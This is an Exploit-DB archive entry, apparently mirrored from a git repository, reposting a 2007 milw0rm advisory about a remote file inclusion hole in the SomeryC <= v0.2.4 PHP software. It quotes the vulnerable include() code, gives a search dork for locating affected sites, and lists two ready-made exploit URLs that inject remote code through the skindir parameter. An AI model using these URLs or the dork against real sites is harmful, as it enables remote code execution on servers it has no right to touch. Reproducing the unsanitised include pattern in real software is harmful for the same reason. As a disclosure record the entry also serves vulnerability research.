exploit-db-mirror/exploits/php/webapps/4320.txt
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

24 lines
No EOL
555 B
Text

### SomeryC <= v0.2.4 Remote File Include ###
#Vendor: http://someryc.mostpopularcomic.com
#download http://someryc.mostpopularcomic.com/sC024.zip
#found by: Katatafish (karatatata@hush.com)
#d0rk: "powered by someryc"
#vuln-code(/admin/system/include.php):
if ($start) {
....
include("$skindir/header.php");
}
....
include("$skindir/footer.php");
#exploit:
http://www.site.com/admin/system/include.php?skindir=[evilCode]
http://www.site.com/admin/system/include.php?start=1&skindir=[evilCode]
# milw0rm.com [2007-08-27]